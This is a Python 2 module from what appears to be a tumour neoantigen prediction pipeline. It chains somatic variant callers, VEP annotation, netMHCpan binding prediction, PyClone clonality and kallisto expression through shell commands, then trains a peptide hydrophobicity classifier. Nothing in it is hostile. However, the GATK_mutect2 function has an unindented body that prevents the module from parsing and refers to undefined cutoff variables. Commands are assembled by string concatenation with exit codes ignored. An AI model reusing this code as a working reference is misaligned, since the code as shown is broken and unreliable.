def sentieon_preprocess(prefix,tumor_fastq_1_path,tumor_fastq_2_path,normal_fastq_1_path,normal_fastq_2_path,alignment_out_fold,somatic_out_fold,vcftools_path,vep_path,vep_cache_path,netmhc_out_path,tumor_depth_cutoff,tumor_vaf_cutoff,normal_vaf_cutoff):
    """Tumor/normal preprocessing and somatic SNV annotation via Sentieon.

    Runs the Sentieon tumor-normal example pipeline, keeps only canonical
    chromosomes from the TNhaplotyper VCF, splits SNVs/indels with vcftools,
    applies depth/VAF filters, annotates missense variants with VEP, and
    emits peptide FASTAs for netMHC.
    NOTE(review): the Sentieon script path is hard-coded to a specific
    machine; all os.system exit codes are ignored.
    """
    cmd_sentieon="bash /home/zhouchi/software/sentieon-genomics-201704.03/doc/pipeline-example-tumor_normal.sh" + ' ' + prefix + ' ' + tumor_fastq_1_path + ' ' + tumor_fastq_2_path + ' ' + normal_fastq_1_path + ' ' + normal_fastq_2_path + ' ' + alignment_out_fold
    print cmd_sentieon
    os.system(cmd_sentieon)
    # Keep the VCF header plus chr1-22/X/Y records only.
    cmd_mutation_filter='grep ' + "\'^#\|chr[1-9]\{0,1\}[0-9XY]\\{0,1\\}\\b\'" + ' ' + alignment_out_fold + '/' + prefix + '-'+ 'output-tnhaplotyper.vcf' + ' > ' + alignment_out_fold + '/' + prefix + '-' + 'output-tnhaplotyper-filter.vcf'
    print cmd_mutation_filter
    os.system(cmd_mutation_filter)
    os.system('mv ' + alignment_out_fold + '/' + prefix + '-'+ 'output-tnhaplotyper-filter.vcf ' + somatic_out_fold)
    # Split into SNV-only and indel-only VCFs (chrM excluded).
    cmd_vcftools_snv=vcftools_path + " --vcf " + somatic_out_fold + '/' + prefix + '-'+ 'output-tnhaplotyper-filter.vcf' + " --remove-filtered-all --remove-indels --recode --recode-INFO-all --not-chr chrM --out " + somatic_out_fold + '/' + prefix + '_'+ 'SNVs_only'
    cmd_vcftools_indel=vcftools_path + " --vcf " + somatic_out_fold + '/' + prefix + '-'+ 'output-tnhaplotyper-filter.vcf' + " --remove-filtered-all --keep-only-indels --recode --recode-INFO-all --not-chr chrM --out " + somatic_out_fold + '/' + prefix + '_'+ 'INDELs_only'
    print cmd_vcftools_snv
    print cmd_vcftools_indel
    os.system(cmd_vcftools_snv)
    os.system(cmd_vcftools_indel)
    # Depth/VAF filtering of the SNVs, then VEP annotation and FASTA export.
    cmd_snv_filter="python ${iTuNES_BIN_PATH}/snv_filter.py -i " + somatic_out_fold + '/' + prefix + '_'+ 'SNVs_only.recode.vcf' + " -d " + str(tumor_depth_cutoff) + " -v " + str(tumor_vaf_cutoff) + " -n " + str(normal_vaf_cutoff) + " -o " + somatic_out_fold + " -s " + prefix
    print cmd_snv_filter
    os.system(cmd_snv_filter)
    cmd_vep_snv=vep_path + " -i " + somatic_out_fold + '/' + prefix + '_'+ 'SNVs_filter.vcf' + " --cache --dir " + vep_cache_path + " --dir_cache " + vep_cache_path + " --force_overwrite --canonical --symbol -o STDOUT --offline | filter_vep --ontology --filter \"CANONICAL is YES and Consequence is missense_variant\" -o " + somatic_out_fold + '/' + prefix + '_'+ 'snv_vep_ann.txt' + " --force_overwrite"
    print cmd_vep_snv
    os.system(cmd_vep_snv)
    cmd_vep_indel=vep_path + " -i " + somatic_out_fold + '/' + prefix + '_'+ 'INDELs_only.recode.vcf' + " --cache --dir " + vep_cache_path + " --dir_cache " + vep_cache_path + " --force_overwrite --canonical --symbol -o STDOUT --offline | filter_vep --ontology --filter \"CANONICAL is YES and Consequence is missense_variant\" -o " + somatic_out_fold + '/' + prefix + '_'+ 'mutect_indel_vep_ann.txt' + " --force_overwrite"
    print cmd_vep_indel
    os.system(cmd_vep_indel)
    cmd_snv="python ${iTuNES_BIN_PATH}/snv2fasta.py -i " + somatic_out_fold + '/' + prefix + '_'+ 'snv_vep_ann.txt' + " -o " + netmhc_out_path + " -s " + prefix
    print cmd_snv
    os.system(cmd_snv)
def GATK_mutect2(GATK_path,REFERENCE,alignment_out_fold,prefix,CPU,dbsnp138,cosmic,somatic_out_fold,vcftools_path,vep_path,vep_cache_path,netmhc_out_path):
#cmd_GATK="java -Xmx4G -jar " + GATK_path + ' -T MuTect2 -nct ' + str(CPU) + ' -R ' + REFERENCE + ' -L chr1' + ' -I:tumor ' + alignment_out_fold + '/' + prefix + '_'+ 'tumor.bam ' + '-I:normal ' + alignment_out_fold + '/' + prefix + '_'+ 'normal.bam ' + '--dbsnp ' + dbsnp138 + ' --cosmic ' + cosmic + ' -o ' + somatic_out_fold + '/' + prefix + '_'+ 'mutect2.vcf'
cmd_GATK="java -Xmx4G -jar " + GATK_path + ' -T MuTect2 -nct ' + str(CPU) + ' -R ' + REFERENCE + ' -I:tumor ' + alignment_out_fold + '/' + prefix + '_'+ 'tumor_recal.bam ' + '-I:normal ' + alignment_out_fold + '/' + prefix + '_'+ 'normal_recal.bam ' + '--dbsnp ' + dbsnp138 + ' --cosmic ' + cosmic + ' -o ' + somatic_out_fold + '/' + prefix + '_'+ 'mutect2.vcf'
print cmd_GATK
#os.system(cmd_GATK)
cmd_mutation_filter='grep ' + "\'^#\|chr[1-9]\{0,1\}[0-9XY]\\{0,1\\}\\b\'" + ' ' + alignment_out_fold + '/' + prefix + '_mutect2.vcf' + ' > ' + alignment_out_fold + '/' + prefix + '_' + 'mutect2_filter.vcf'
print cmd_mutation_filter
os.system(cmd_mutation_filter)
cmd_vcftools_snv=vcftools_path + " --vcf " + somatic_out_fold + '/' + prefix + '_'+ 'mutect2_filter.vcf' + " --remove-filtered-all --remove-indels --recode --recode-INFO-all --not-chr chrM --out " + somatic_out_fold + '/' + prefix + '_'+ 'SNVs_only'
cmd_vcftools_indel=vcftools_path + " --vcf " + somatic_out_fold + '/' + prefix + '_'+ 'mutect2_filter.vcf' + " --remove-filtered-all --keep-only-indels --recode --recode-INFO-all --not-chr chrM --out " + somatic_out_fold + '/' + prefix + '_'+ 'INDELs_only'
print cmd_vcftools_snv
print cmd_vcftools_indel
os.system(cmd_vcftools_snv)
#os.system(cmd_vcftools_indel)
cmd_snv_filter="python ${iTuNES_BIN_PATH}/snv_filter.py -i " + somatic_out_fold + '/' + prefix + '_'+ 'SNVs_only.recode.vcf' + " -d " + str(tumor_depth_cutoff) + " -v " + str(tumor_vaf_cutoff) + " -n " + str(normal_vaf_cutoff) + " -o " + somatic_out_fold + " -s " + prefix
print cmd_snv_filter
os.system(cmd_snv_filter)
cmd_vep=vep_path + " -i " + somatic_out_fold + '/' + prefix + '_'+ 'SNVs_only.recode.vcf' + " --cache --dir " + vep_cache_path + " --dir_cache " + vep_cache_path + " --force_overwrite --canonical --symbol -o STDOUT --offline | filter_vep --ontology --filter \"CANONICAL is YES and Consequence is missense_variant\" -o " + somatic_out_fold + '/' + prefix + '_'+ 'snv_vep_ann.txt' + " --force_overwrite"
print cmd_vep
os.system(cmd_vep)
cmd_snv="python ${iTuNES_BIN_PATH}/snv2fasta.py -i " + somatic_out_fold + '/' + prefix + '_'+ 'snv_vep_ann.txt' + " -o " + netmhc_out_path + " -s " + prefix
print cmd_snv
os.system(cmd_snv)
def netMHCpan(fasta_file,hla_str,netmhc_out_file,out_dir,split_num,netMHCpan_path,tmp_dir):
    """Run netMHCpan over a FASTA file, parallelised across HLA alleles.

    The embedded bash script splits the FASTA into <split_num>-line chunks
    inside a scratch dir, runs netMHCpan (-l 9,10 -BA) for every allele of
    the comma-separated hla_str on each chunk as background jobs, then
    concatenates all per-chunk outputs into netmhc_out_file and removes the
    scratch dir. The script text is the runtime payload and is left intact.
    """
    str_proc=r'''
set -x
input_fasta=%s
hla_str=%s
netmhc_out=%s
out_dir=%s
split_num=%s
netMHCpan=%s
tmp=%s
if [ -d ${out_dir}/${tmp} ];then
rm -rf ${out_dir}/${tmp}
mkdir -p ${out_dir}/${tmp}
else
mkdir -p ${out_dir}/${tmp}
fi
if [ -f ${netmhc_out} ];then
rm ${netmhc_out}
fi
split -l ${split_num} ${input_fasta} ${out_dir}/${tmp}/
filelist=`ls ${out_dir}/${tmp}/`
arr1=(${filelist})
echo ${arr1[@]}
OLD_IFS="$IFS"
IFS=","
arr2=(${hla_str})
IFS="$OLD_IFS"
for s in ${arr2[@]}
do
{
echo $s
for file_l in ${arr1[@]}
do
{
echo ${file_l}n
$netMHCpan -a $s -f ${out_dir}/${tmp}/${file_l} -l 9,10 -BA > ${out_dir}/${tmp}/${s}_${file_l}_tmp_netmhc.txt
} &
done
wait
}
done
for file_l in ${arr1[@]}
do
{
rm ${out_dir}/${tmp}/${file_l}
}
done
filelist1=`ls ${out_dir}/${tmp}/`
for file_r in $filelist1
do
{
cat ${out_dir}/${tmp}/${file_r} >> ${netmhc_out}
rm ${out_dir}/${tmp}/${file_r}
}
done
rm -rf ${out_dir}/${tmp}
set +x
'''%(fasta_file,hla_str,netmhc_out_file,out_dir,split_num,netMHCpan_path,tmp_dir)
    subprocess.call(str_proc, shell=True, executable='/bin/bash')
def varscan_somatic_caling_drift(somatic_mutation_fold,alignment_out_fold,PREFIX,REFERENCE,vep_cache,samtools_path,varscan_path,vep_path,netmhc_out_fold,logfile_fold):
    """Somatic SNV calling with VarScan2 via samtools mpileup FIFOs.

    The embedded bash script streams tumor/normal pileups through named
    pipes into `varscan somatic`, runs `processSomatic`, and keeps only
    canonical-chromosome SNP calls in <PREFIX>_filter.snp. The trailing
    VEP/FASTA steps are commented out in the payload.
    NOTE(review): vep_cache, vep_path and netmhc_out_fold are only consumed
    by those commented-out lines.
    """
    str_proc = r'''
set -e
somat_f=%s
alignment_fold=%s
PREFIX=%s
REFERENCE=%s
vep_cache=%s
netmhc_out=%s
samtools=%s
varscan=%s
vep=%s
logfile_fold=%s
if [ ! -d ${somat_f} ];then
mkdir ${somat_f}
fi
if [ ! -d ${netmhc_out} ];then
mkdir ${netmhc_out}
fi
#rm -rf ${somat_f}/*
cd ${somat_f}
mkfifo ${PREFIX}_normal.fifo
mkfifo ${PREFIX}_tumor.fifo
$samtools mpileup -f ${REFERENCE} -q 5 -Q 20 -L 10000 -d 10000 ${alignment_fold}/${PREFIX}_normal_recal.bam > ${PREFIX}_normal.fifo &
$samtools mpileup -f ${REFERENCE} -q 5 -Q 20 -L 10000 -d 10000 ${alignment_fold}/${PREFIX}_tumor_recal.bam > ${PREFIX}_tumor.fifo &
java -jar $varscan somatic ${PREFIX}_normal.fifo ${PREFIX}_tumor.fifo ${PREFIX} #> ${logfile_fold}/${PREFIX}_somatic.log #>2&1 #--output-vcf 1
java -jar $varscan processSomatic ${PREFIX}.snp
grep '^chrom\|chr[1-9]\{0,1\}[0-9XY]\{0,1\}\b' ${PREFIX}.snp > ${PREFIX}_filter.snp
rm ${PREFIX}_normal.fifo ${PREFIX}_tumor.fifo
cd ..
#sed '1d' ${somat_f}/${PREFIX}.snp.Somatic | awk -F '\t' '{print $1,$2,$2,$3"/"$4}' > ${somat_f}/${PREFIX}_snv_vep_input.vcf
#$vep -i ${somat_f}/${PREFIX}_snv_vep_input.vcf --cache --dir $vep_cache --dir_cache $vep_cache --force_overwrite --symbol -o STDOUT --offline | filter_vep --ontology --filter "Consequence is missense_variant" -o ${somat_f}/${PREFIX}_snv_vep_ann.txt --force_overwrite
#python ${iTuNES_BIN_PATH}/snv2fasta.py -i ${somat_f}/${PREFIX}_snv_vep_ann.txt -o ${netmhc_out} -s ${PREFIX}
'''%(somatic_mutation_fold,alignment_out_fold,PREFIX,REFERENCE,vep_cache,netmhc_out_fold,samtools_path,varscan_path,vep_path,logfile_fold)
    print str_proc
    subprocess.call(str_proc, shell=True, executable='/bin/bash')
#def varscan_somatic_caling_drift(somatic_mutation_fold,alignment_out_fold,PREFIX,REFERENCE,vep_cache,samtools_path,varscan_path,vep_path,netmhc_out_fold,logfile_fold):
# str_proc = r'''
#set -e
#somat_f=%s
#alignment_fold=%s
#PREFIX=%s
#REFERENCE=%s
#vep_cache=%s
#netmhc_out=%s
#samtools=%s
#varscan=%s
#vep=%s
#logfile_fold=%s
#if [ ! -d ${somat_f} ];then
# mkdir ${somat_f}
#fi
#if [ ! -d ${netmhc_out} ];then
# mkdir ${netmhc_out}
#fi
#rm -rf ${somat_f}/*
#cd ${somat_f}
#mkfifo ${PREFIX}_normal.fifo
#mkfifo ${PREFIX}_tumor.fifo
#$samtools mpileup -f ${REFERENCE} -q 5 -Q 20 -L 10000 -d 10000 ${alignment_fold}/${PREFIX}_normal_recal.bam > ${PREFIX}_normal.fifo &
#$samtools mpileup -f ${REFERENCE} -q 5 -Q 20 -L 10000 -d 10000 ${alignment_fold}/${PREFIX}_tumor_recal.bam > ${PREFIX}_tumor.fifo &
#java -jar $varscan somatic ${PREFIX}_normal.fifo ${PREFIX}_tumor.fifo ${PREFIX} > ${logfile_fold}/${PREFIX}_somatic.log #>2&1 #--output-vcf 1
#java -jar $varscan processSomatic ${PREFIX}.snp
#rm ${PREFIX}_normal.fifo ${PREFIX}_tumor.fifo
#cd ..
#sed '1d' ${somat_f}/${PREFIX}.snp.Somatic | awk -F '\t' '{print $1,$2,$2,$3"/"$4}' > ${somat_f}/${PREFIX}_snv_vep_input.vcf
#$vep -i ${somat_f}/${PREFIX}_snv_vep_input.vcf --cache --dir $vep_cache --dir_cache $vep_cache --force_overwrite --symbol -o STDOUT --offline | filter_vep --ontology --filter "Consequence is missense_variant" -o ${somat_f}/${PREFIX}_snv_vep_ann.txt --force_overwrite
#python ${iTuNES_BIN_PATH}/snv2fasta.py -i ${somat_f}/${PREFIX}_snv_vep_ann.txt -o ${netmhc_out} -s ${PREFIX}
#'''%(somatic_mutation_fold,alignment_out_fold,PREFIX,REFERENCE,vep_cache,netmhc_out_fold,samtools_path,varscan_path,vep_path,logfile_fold)
# print str_proc
# subprocess.call(str_proc, shell=True, executable='/bin/bash')
def varscan_neo(snv_fasta_file,hla_str,snv_netmhc_out_file,netmhc_out_fold,split_num,prefix,exp_file,binding_fc_aff_cutoff,binding_aff_cutoff,fpkm_cutoff,netctl_fold,netMHCpan_path):
    """Predict SNV neoantigen candidates: netMHCpan binding + netCTLpan.

    Runs netMHCpan on the SNV peptide FASTA, then a bash step that parses
    the netMHC output with affinity/fold-change/FPKM cutoffs and feeds the
    surviving candidates into the netCTLpan wrapper.
    NOTE(review): the %%d placeholders require integer cutoffs.
    """
    netMHCpan(snv_fasta_file,hla_str,snv_netmhc_out_file,netmhc_out_fold,split_num,netMHCpan_path,'tmp_snv')
    str_proc1=r'''
PREFIX=%s
netmhc_out=%s
Exp_file=%s
Binding_Aff_Fc_Cutoff=%d
Binding_Aff_Cutoff=%d
Fpkm_Cutoff=%d
hla_str=%s
netctl_fold=%s
python ${iTuNES_BIN_PATH}/sm_netMHC_result_parse.py -i ${netmhc_out}/${PREFIX}_snv_netmhc.txt -g ${netmhc_out}/${PREFIX}_snv.fasta -o ${netmhc_out} -s ${PREFIX}_snv -e ${Exp_file} -a ${Binding_Aff_Fc_Cutoff} -b ${Binding_Aff_Cutoff} -f ${Fpkm_Cutoff} -l ${hla_str}
python ${iTuNES_BIN_PATH}/netCTLPAN.py -i ${netmhc_out}/${PREFIX}_snv_final_neo_candidate.txt -o ${netctl_fold} -s ${PREFIX}_snv
'''%(prefix,netmhc_out_fold,exp_file,binding_fc_aff_cutoff,binding_aff_cutoff,fpkm_cutoff,hla_str,netctl_fold)
    print str_proc1
    subprocess.call(str_proc1, shell=True, executable='/bin/bash')
def indel_calling_drift(strelka_out_fold,strelka_path,alignment_out_fold,PREFIX,REFERENCE,vep_cache,netmhc_out_fold,CPU,vep_path):
    """Somatic indel calling with Strelka2 and peptide FASTA generation.

    The embedded bash script (re)creates the Strelka run dir, configures
    and runs the somatic workflow in exome mode, filters indels with
    vcftools, annotates canonical coding variants with VEP, and converts
    deletions/insertions to peptide FASTAs for netMHC.
    """
    str_proc2=r'''
set -e
strelka_fold=%s
strelka_path=%s
alignment_fold=%s
PREFIX=%s
REFERENCE=%s
vep_cache=%s
netmhc_out=%s
cpu=%s
vep=%s
if [ -d ${strelka_fold} ];then
rm -rf ${strelka_fold}
fi
python ${strelka_path}/configureStrelkaSomaticWorkflow.py --tumorBam=${alignment_fold}/${PREFIX}_tumor_recal.bam --normalBam=${alignment_fold}/${PREFIX}_normal_recal.bam --referenceFasta=${REFERENCE} --config=${strelka_path}/configureStrelkaSomaticWorkflow.py.ini --runDir=${strelka_fold} --exome
python ${strelka_fold}/runWorkflow.py -m local -j $cpu -q ${PREFIX}_strelka -g 32 --quiet
gunzip ${strelka_fold}/results/variants/somatic.indels.vcf.gz
vcftools --vcf ${strelka_fold}/results/variants/somatic.indels.vcf --remove-filtered-all --keep-only-indels --recode --recode-INFO-all --not-chr chrM --out ${strelka_fold}/${PREFIX}_INDELs_only
$vep -i ${strelka_fold}/${PREFIX}_INDELs_only.recode.vcf --cache --dir ${vep_cache} --dir_cache ${vep_cache} --force_overwrite --canonical --symbol -o STDOUT --offline | filter_vep --ontology --filter "CANONICAL is YES and Consequence is coding_sequence_variant" -o ${strelka_fold}/${PREFIX}_strelka_indel_vep_ann.txt --force_overwrite
python ${iTuNES_BIN_PATH}/varscandel2fasta.py -i ${strelka_fold}/${PREFIX}_strelka_indel_vep_ann.txt -o ${netmhc_out} -s ${PREFIX}_strelka
python ${iTuNES_BIN_PATH}/varscanins2fasta.py -i ${strelka_fold}/${PREFIX}_strelka_indel_vep_ann.txt -o ${netmhc_out} -s ${PREFIX}_strelka
'''%(strelka_out_fold,strelka_path,alignment_out_fold,PREFIX,REFERENCE,vep_cache,netmhc_out_fold,CPU,vep_path)
    print str_proc2
    subprocess.call(str_proc2, shell=True, executable='/bin/bash')
def indel_neo(somatic_mutation_fold,PREFIX,vep_cache,netmhc_out_fold,vep_path,indel_fasta_file,hla_str,indel_netmhc_out_file,split_num,exp_file,binding_fc_aff_cutoff,binding_aff_cutoff,fpkm_cutoff,netctl_fold,netMHCpan_path,strelka_fold):
    """Indel neoantigen prediction from VarScan + Strelka indel calls.

    Steps: annotate VarScan indels with VEP and convert to peptide FASTAs;
    merge the Strelka and VarScan del/ins FASTAs into <PREFIX>_indel.fasta;
    run netMHCpan; parse bindings against affinity/FPKM cutoffs and run the
    netCTLpan wrapper; finally extract indel VAFs for the candidates.
    """
    # Step 1: VEP-annotate the VarScan indels and emit del/ins FASTAs.
    str_proc1='''
somatic_mutation=%s
PREFIX=%s
vep_cache=%s
netmhc_out=%s
vep=%s
python ${iTuNES_BIN_PATH}/varscan_indel_preprocess.py -i ${somatic_mutation}/${PREFIX}.indel -o ${somatic_mutation} -s ${PREFIX}
$vep -i ${somatic_mutation}/${PREFIX}_varscan_indel.vcf --cache --dir $vep_cache --dir_cache $vep_cache --force_overwrite --symbol -o STDOUT --offline | filter_vep --ontology --filter "Consequence is coding_sequence_variant" -o ${somatic_mutation}/${PREFIX}_varscan_indel_vep_ann.txt --force_overwrite
python ${iTuNES_BIN_PATH}/varscandel2fasta.py -i ${somatic_mutation}/${PREFIX}_varscan_indel_vep_ann.txt -o ${netmhc_out} -s ${PREFIX}_varscan
python ${iTuNES_BIN_PATH}/varscanins2fasta.py -i ${somatic_mutation}/${PREFIX}_varscan_indel_vep_ann.txt -o ${netmhc_out} -s ${PREFIX}_varscan
'''%(somatic_mutation_fold,PREFIX,vep_cache,netmhc_out_fold,vep_path)
    print str_proc1
    subprocess.call(str_proc1, shell=True, executable='/bin/bash')
    # Step 2: merge Strelka and VarScan deletion/insertion FASTAs.
    str_proc3=r'''
PREFIX=%s
netmhc_out=%s
cat ${netmhc_out}/${PREFIX}_strelka_del.fasta > ${netmhc_out}/${PREFIX}_indel.fasta
cat ${netmhc_out}/${PREFIX}_strelka_ins.fasta >> ${netmhc_out}/${PREFIX}_indel.fasta
cat ${netmhc_out}/${PREFIX}_varscan_del.fasta >> ${netmhc_out}/${PREFIX}_indel.fasta
cat ${netmhc_out}/${PREFIX}_varscan_ins.fasta >> ${netmhc_out}/${PREFIX}_indel.fasta
'''%(PREFIX,netmhc_out_fold)
    subprocess.call(str_proc3, shell=True, executable='/bin/bash')
    # Step 3: MHC binding prediction on the merged indel peptides.
    netMHCpan(indel_fasta_file,hla_str,indel_netmhc_out_file,netmhc_out_fold,split_num,netMHCpan_path,'tmp_indel')
    # Step 4: filter candidates and run netCTLpan.
    str_proc4=r'''
set -e
PREFIX=%s
netmhc_out=%s
Exp_file=%s
Binding_Aff_Fc_Cutoff=%s
Binding_Aff_Cutoff=%s
Fpkm_Cutoff=%s
hla_str=%s
netctl_fold=%s
python ${iTuNES_BIN_PATH}/sm_netMHC_result_parse.py -i ${netmhc_out}/${PREFIX}_indel_netmhc.txt -g ${netmhc_out}/${PREFIX}_indel.fasta -o ${netmhc_out} -s ${PREFIX}_indel -e ${Exp_file} -a ${Binding_Aff_Fc_Cutoff} -b ${Binding_Aff_Cutoff} -f ${Fpkm_Cutoff} -l ${hla_str}
python ${iTuNES_BIN_PATH}/netCTLPAN.py -i ${netmhc_out}/${PREFIX}_indel_final_neo_candidate.txt -o ${netctl_fold} -s ${PREFIX}_indel
'''%(PREFIX,netmhc_out_fold,exp_file,binding_fc_aff_cutoff,binding_aff_cutoff,fpkm_cutoff,hla_str,netctl_fold)
    print str_proc4
    subprocess.call(str_proc4, shell=True, executable='/bin/bash')
    # Step 5: attach variant allele fractions to the candidate list.
    cmd_indel_vaf="python ${iTuNES_BIN_PATH}/indel_vaf_extract.py -n " + netctl_fold + "/" + PREFIX + "_indel_netctl_concact.txt -i " + somatic_mutation_fold + "/" + PREFIX + ".indel -s " + strelka_fold + "/results/variants/somatic.indels.vcf -o " + netctl_fold + " -S " + PREFIX
    print cmd_indel_vaf
    os.system(cmd_indel_vaf)
def varscan_copynumber_calling(varscan_copynumber_fold,prefix,alignment_out_fold,REFERENCE,samtools_path,varscan_path,logfile_fold):
    """Copy-number calling with VarScan2 via samtools mpileup FIFOs.

    Mirrors the somatic-SNV FIFO pattern: streams tumor/normal pileups
    through named pipes into `varscan copynumber` and keeps only
    canonical-chromosome segments in <PREFIX>_filter.copynumber.
    """
    str_proc=r'''
copynumber_profile=%s
PREFIX=%s
alignment_fold=%s
REFERENCE=%s
samtools=%s
varscan=%s
logfile_fold=%s
if [ ! -d ${copynumber_profile} ];then
mkdir ${copynumber_profile}
fi
#rm -rf ${copynumber_profile}/*
cd ${copynumber_profile}
mkfifo ${PREFIX}_normal.fifo
mkfifo ${PREFIX}_tumor.fifo
$samtools mpileup -f ${REFERENCE} -q 5 -Q 20 -L 10000 -d 10000 ${alignment_fold}/${PREFIX}_normal_recal.bam > ${PREFIX}_normal.fifo &
$samtools mpileup -f ${REFERENCE} -q 5 -Q 20 -L 10000 -d 10000 ${alignment_fold}/${PREFIX}_tumor_recal.bam > ${PREFIX}_tumor.fifo &
java -jar $varscan copynumber ${PREFIX}_normal.fifo ${PREFIX}_tumor.fifo ${PREFIX} #> ${logfile_fold}/${PREFIX}_copynumber.log 2>&1
grep '^chrom\|chr[1-9]\{0,1\}[0-9XY]\{0,1\}\b' ${PREFIX}.copynumber > ${PREFIX}_filter.copynumber
rm ${PREFIX}_normal.fifo ${PREFIX}_tumor.fifo
cd ..
'''%(varscan_copynumber_fold,prefix,alignment_out_fold,REFERENCE,samtools_path,varscan_path,logfile_fold)
    subprocess.call(str_proc, shell=True, executable='/bin/bash')
def pyclone_annotation(somatic_mutation_fold,varscan_copynumber_fold,prefix,pyclone_fold,netctl_fold,coverage,pyclone_path,cancer_type,logfile_fold):
    """Clonality analysis with sequenza + PyClone and neoantigen annotation.

    The embedded bash script estimates segment copy number and cellularity
    with an R helper, builds the PyClone input from the SNV candidates,
    runs the full PyClone setup/run/build_table cycle, and finally attaches
    the per-locus clonality estimates back onto the neoantigen table.
    NOTE(review): COVERAGE uses a %%d placeholder, so `coverage` must be an
    integer.
    """
    str_proc=r'''
somatic_mutation=%s
copynumber_profile=%s
PREFIX=%s
pyclone=%s
netctl=%s
COVERAGE=%d
Pyclone=%s
cancer_type=%s
logfile_fold=%s
Rscript ${iTuNES_BIN_PATH}/sequenza_test.R ${somatic_mutation}/${PREFIX}_filter.snp ${copynumber_profile}/${PREFIX}_filter.copynumber ${copynumber_profile}/ ${PREFIX} #> ${logfile_fold}/${PREFIX}_pyclone.log 2>&1
python ${iTuNES_BIN_PATH}/pyclone_input.py -n ${netctl}/${PREFIX}_snv_netctl_concact.txt -i ${somatic_mutation}/${PREFIX}_snv_vep_ann.txt -s ${somatic_mutation}/${PREFIX}_SNVs_only.recode.vcf -c ${copynumber_profile}/${PREFIX}_seg_copynumber.txt -o ${pyclone} -S ${PREFIX} -C ${COVERAGE}
TUMOR_CONTENT=`cat ${copynumber_profile}/${PREFIX}_cellularity.txt`
$Pyclone setup_analysis --in_files ${pyclone}/${PREFIX}_pyclone_input.tsv --tumour_contents $TUMOR_CONTENT --prior major_copy_number --working_dir ${pyclone}
$Pyclone run_analysis --config_file ${pyclone}/config.yaml
$Pyclone build_table --config_file ${pyclone}/config.yaml --out_file ${pyclone}/loci.tsv --table_type loci
python ${iTuNES_BIN_PATH}/neo_pyclone_annotation.py -n ${netctl}/${PREFIX}_snv_netctl_concact.txt -i ${somatic_mutation}/${PREFIX}_snv_vep_ann.txt -s ${pyclone}/loci.tsv -o ${netctl} -S ${PREFIX} -t ${cancer_type}
'''%(somatic_mutation_fold,varscan_copynumber_fold,prefix,pyclone_fold,netctl_fold,coverage,pyclone_path,cancer_type,logfile_fold)
    print str_proc
    subprocess.call(str_proc, shell=True, executable='/bin/bash')
def kallisto_expression(raw_fastq_path_first,raw_fastq_path_second,kallisto_path,kallisto_out_fold,prefix,kallisto_cdna_path,logfile_fold):
    """Quantify transcript expression with kallisto (index + quant).

    The index is built next to the cDNA FASTA as <basename>.idx and quant
    results land in kallisto_out_fold; both commands log to logfile_fold.
    NOTE(review): the index is rebuilt on every call, even when the .idx
    file already exists.
    """
    cdna_path_dir = os.path.dirname(kallisto_cdna_path)
    cnd_file_prefix = os.path.splitext(os.path.basename(kallisto_cdna_path))[0]
    kallisto_index_path = cdna_path_dir + '/' + cnd_file_prefix + '.idx'
    cmd_kallisto_index = kallisto_path + " index -i " + kallisto_index_path + ' ' + kallisto_cdna_path + ' > ' + logfile_fold + '/' + prefix + '_kallisto_index.log' + ' 2>&1'
    cmd_kallisto_quant = kallisto_path + " quant -i " + kallisto_index_path + " -o " + kallisto_out_fold + " " + raw_fastq_path_first + " " + raw_fastq_path_second + ' > ' + logfile_fold + '/' + prefix + '_kallisto.log' + ' 2>&1'
    print cmd_kallisto_index
    os.system(cmd_kallisto_index)
    print cmd_kallisto_quant
    os.system(cmd_kallisto_quant)
def plot_results(X, Y_, means, covariances, index, title, gmm_classification_file):
    """Scatter-plot GMM assignments with covariance ellipses, saved to file.

    X: 2-D data (first two columns plotted); Y_: integer component label
    per sample; means/covariances: per-component Gaussian parameters;
    index: subplot offset; gmm_classification_file: output image path.
    Only two colors cycle ('navy', 'c'), so components beyond two reuse them.
    """
    color_iter = itertools.cycle(['navy', 'c'])
    splot = plt.subplot(1, 1, 1 + index)
    #splot=plt.plot()
    for i, (mean, covar, color) in enumerate(zip(means, covariances, color_iter)):
        print i,color
        # Eigen-decompose the covariance: eigenvalues give the ellipse
        # half-axes (scaled to ~2 sigma), the first eigenvector its tilt.
        v, w = linalg.eigh(covar)
        v = 2. * np.sqrt(2.) * np.sqrt(v)
        u = w[0] / linalg.norm(w[0])
        # as the DP will not use every component it has access to
        # unless it needs it, we shouldn't plot the redundant
        # components.
        if not np.any(Y_ == i):
            continue
        plt.scatter(X[Y_ == i, 0], X[Y_ == i, 1], .8, color=color)
        # Plot an ellipse to show the Gaussian component
        angle = np.arctan(u[1] / u[0])
        angle = 180. * angle / np.pi # convert to degrees
        ell = mpl.patches.Ellipse(mean, v[0], v[1], 180. + angle, color=color)
        ell.set_clip_box(splot.bbox)
        ell.set_alpha(0.5)
        splot.add_artist(ell)
    # Fixed axis window; assumes the projected data fits this range --
    # TODO confirm against the caller's PCA output.
    plt.xlim(-1.0, 1.8)
    plt.ylim(-.5, .8)
    plt.xlabel('first component')
    plt.ylabel('second component')
    #plt.xticks()
    #plt.yticks()
    plt.title(title)
    plt.savefig(gmm_classification_file)
def hydro_vector(pep):
    """Return the Kyte-Doolittle hydropathy value for each residue of *pep*.

    Input is case-insensitive; raises KeyError for non-standard residues.
    """
    kd_scale = {"A": 1.8, "C": 2.5, "D": -3.5, "E": -3.5, "F": 2.8,
                "G": -0.4, "H": -3.2, "I": 4.5, "K": -3.9, "L": 3.8,
                "M": 1.9, "N": -3.5, "P": -1.6, "Q": -3.5, "R": -4.5,
                "S": -0.8, "T": -0.7, "V": 4.2, "W": -0.9, "Y": -1.3}
    return [kd_scale[residue.upper()] for residue in pep]
def Train_hydrophobicity_xgboost(postive_pep_file,negative_pep_file):
    """Train a classifier on hydrophobicity vectors of 9-mer peptides.

    Reads FASTA-style positive/negative peptide files, keeps only 9-mers,
    encodes each as its per-residue hydrophobicity vector, undersamples the
    majority class with NearMiss, and fits an MLP.

    NOTE(review): despite the name, this trains an MLPClassifier, not XGBoost.
    NOTE(review): X_scale is computed but never used -- the model is fitted on
    the unscaled, resampled features.
    """
    # Collect 9-mer peptides from the positive FASTA (skip '>' headers).
    pos_pep_list=[]
    for line in open(postive_pep_file):
        if line.startswith(">"):
            continue
        else:
            record=line.strip()
            if len(record)==9:
                pos_pep_list.append(record)
    # Same extraction for the negative FASTA.
    neg_pep_list=[]
    for line in open(negative_pep_file):
        if line.startswith(">"):
            continue
        else:
            record=line.strip()
            if len(record)==9:
                neg_pep_list.append(record)
    pos_pep_hydro_list=[hydro_vector(p) for p in pos_pep_list]#[0:len(neg_pep_all)]
